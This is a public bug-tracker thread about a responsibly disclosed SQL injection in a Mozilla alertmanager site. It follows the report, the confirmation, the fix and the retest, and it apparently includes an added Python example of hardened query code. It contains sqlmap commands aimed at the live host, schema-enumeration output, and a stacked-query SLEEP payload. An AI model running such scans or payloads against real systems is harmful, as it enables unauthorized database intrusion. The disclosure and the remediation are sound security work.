Closed Bug 1293111 Opened 8 years ago Closed 8 years ago

SQL injection vulnerability on alertmanager.allizom.org

Categories

(Websites :: Other, defect)

defect
Not set
normal

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: griffin.francis.1993, Unassigned)

Details

(Keywords: reporter-external, sec-high, wsec-sqli)

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Steps to reproduce:

Hello, the URL alertmanager.allizom.org/data/setadetails/?date= is vulnerable to SQLi via the date parameter. To validate this I issued the following command to sqlmap:

C:\Users\Griffin\Desktop\sqlmap>sqlmap.py -u "alertmanager.allizom.org/data/seta/details/?date=" --random-agent --tamper=space2comment --schema --threads=10

The following schema was returned (I did not proceed from here).

web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.11
[16:17:29] [INFO] enumerating database management system schema
[16:17:29] [INFO] fetching database names
[16:17:29] [INFO] fetching number of databases
[16:17:29] [INFO] resumed: 8
[16:17:29] [INFO] resumed: information_schema
[16:17:29] [INFO] resumed: alertbot
[16:17:29] [INFO] resumed: alerts
[16:17:29] [INFO] resumed: mysql
[16:17:29] [INFO] resumed: ouija
[16:17:29] [INFO] resumed: ouijatest
[16:17:29] [INFO] resumed: performance_schema
[16:17:29] [INFO] resumed: test



Actual results:

The date parameter does not properly sanitize against malicious input.


Expected results:

The above information should not have been returned back within the sqlmap response.

Griffin: thanks, the above seems pretty self-describing. I'll do some testing and see how bad it is.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Griffin: I tried briefly to confirm your observations using the latest sqlmap (1.0.8.15#dev) with the above parameters. It didn't return the same results as you have above. Would you mind sharing exactly what version of sqlmap you're using and whether the above parameters were the exact parameters used to enumerate the DB list?
Flags: needinfo?(griffin.francis.1993)
Here are my results output from a slightly more tuned scan, just for transparency...

$ python ./sqlmap.py -u "alertmanager.allizom.org/data/seta/details/?date=1" --random-agent --tamper=space2comment --schema --threads=10 --dbms mysql
         _
 ___ ___| |_____ ___ ___  {1.0.8.15#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:38:32

[20:38:32] [INFO] loading tamper script 'space2comment'
[20:38:32] [INFO] fetched random HTTP User-Agent header from file '/Users/jclaudius/code/sqlmap-dev/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3'
[20:38:32] [INFO] testing connection to the target URL
[20:38:32] [INFO] testing if the target URL is stable
[20:38:33] [INFO] target URL is stable
[20:38:33] [INFO] testing if GET parameter 'date' is dynamic
[20:38:33] [WARNING] GET parameter 'date' does not appear dynamic
[20:38:33] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable
[20:38:33] [INFO] testing for SQL injection on GET parameter 'date'
[20:38:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:38:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:38:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[20:38:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[20:38:36] [INFO] testing 'MySQL inline queries'
[20:38:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[20:38:36] [WARNING] time-based comparison requires larger statistical model, please wait.... (done)
[20:38:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[20:38:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:38:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:38:52] [WARNING] GET parameter 'date' is not injectable
[20:38:52] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 20:38:52
Looks like there may have been a typo above. Corrected URL:

http://alertmanager.allizom.org/data/setadetails/?date=
Ok, using the newly corrected URL, I was able to confirm this SQLi vulnerability.

...SNIP...
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: date (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: date=';SELECT SLEEP(5)#
---
[21:11:30] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:11:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL > 5.0.11
...SNIP...
Flags: needinfo?(griffin.francis.1993)
jmaher: I see you're one of the more prominent developers of alertmanager. Could you please take a look at this first thing tomorrow and see if we can get a code fix.
Flags: needinfo?(jmaher)
Thanks for the confirmation Jonathan. Much appreciated.
Summary: SQLI on alertmanager.allizom.org → SQL injection vulnerability on alertmanager.allizom.org
Flags: sec-bounty?
Updated:
https://github.com/mozilla/ouija/commit/8ab444e1c80e603758759c1c71417b0a53ede131

This is on the live server; thanks for pointing this out.
Flags: needinfo?(jmaher)
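As an added example (not ouija's code, and not the contents of the commit above), the pattern behind this class of bug beside its fix: a date parameter spliced into SQL text versus validated as YYYY-MM-DD and bound as a query parameter. The table, column names and rows are constructed, and sqlite3 stands in for MySQL so it runs offline.

```python
"""Added example (not ouija's code): how a ``?date=`` parameter reaches the
database unsafely, and the hardened version. sqlite3 stands in for MySQL so
this runs offline; the table, columns and rows are constructed for the demo."""
import re
import sqlite3
from datetime import datetime

# Stacked-query payload recorded in the bug report (sqlmap's tamper script
# would further rewrite spaces; that does not change what is shown here).
REPORTED_PAYLOAD = "';SELECT SLEEP(5)#"

UNSAFE_SQL = "SELECT job FROM seta WHERE date='%s'"   # value spliced into SQL text
SAFE_SQL = "SELECT job FROM seta WHERE date=?"        # value bound by the driver
DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")


def _demo_db():
    """In-memory stand-in for the alertmanager database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE seta (date TEXT, job TEXT)")
    conn.executemany("INSERT INTO seta VALUES (?, ?)",
                     [("2016-08-08", "linux64-debug"), ("2016-08-09", "win32-opt")])
    return conn


def vulnerable_query(date):
    """The bug class: the quote in the payload closes the literal and ';'
    starts a second statement, which MySQL runs when multi-statements are on."""
    return UNSAFE_SQL % date


def validate_date(date):
    """Allow-list check: exactly YYYY-MM-DD and a real calendar date."""
    if not DATE_RE.fullmatch(date):
        return False
    try:
        datetime.strptime(date, "%Y-%m-%d")
    except ValueError:
        return False
    return True


def fetch_jobs(date, validate=True):
    """Hardened path: reject malformed input, then bind the value as data."""
    if validate and not validate_date(date):
        raise ValueError("date must be YYYY-MM-DD")
    conn = _demo_db()
    rows = conn.execute(SAFE_SQL, (date,)).fetchall()
    conn.close()
    return [job for (job,) in rows]
```

Even with parameter binding alone (`validate=False`), the recorded payload is bound as an inert string and matches nothing; the format check adds a second layer that rejects it before any query is run.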
I also worked with jmaher on this and did a second pass with sqlmap. Overall result is that it seems fixed.

Here are the results of my sqlmap verification:

$ python ./sqlmap.py -u "alertmanager.allizom.org/data/setadetails/?date=1" --random-agent --tamper=space2comment --schema --threads=10 --dbms mysql
         _
 ___ ___| |_____ ___ ___  {1.0.8.15#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:36:25

[12:36:25] [INFO] loading tamper script 'space2comment'
[12:36:25] [INFO] fetched random HTTP User-Agent header from file '/Users/jclaudius/code/sqlmap-dev/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre'
[12:36:25] [INFO] testing connection to the target URL
[12:36:26] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:36:26] [INFO] testing if the target URL is stable
[12:36:27] [INFO] target URL is stable
[12:36:27] [INFO] testing if GET parameter 'date' is dynamic
[12:36:27] [WARNING] GET parameter 'date' does not appear dynamic
[12:36:27] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable
[12:38:08] [INFO] testing for SQL injection on GET parameter 'date'
[12:38:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[12:38:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:38:15] [INFO] testing 'MySQL inline queries'
[12:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:38:15] [WARNING] time-based comparison requires larger statistical model, please wait.... (done)                                                        
[12:38:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:38:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:38:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[12:39:06] [WARNING] GET parameter 'date' is not injectable
[12:39:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

[*] shutting down at 12:39:06
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
jmaher: many thanks on the quick turn around for this!
Griffin: we discussed with the bounty team just now, even though this site isn't enrolled in the bounty program and a compromise of the service wouldn't be critical based on what it's holding and where it lives, we believe the severity of the bug is sufficient to imply RCE or service compromise impact and thus we're going to reward a bounty in this case.
Flags: sec-bounty? → sec-bounty+
Thanks for the turn around on this report. It is much appreciated.
Making bug public, since it's fixed.
Group: websites-security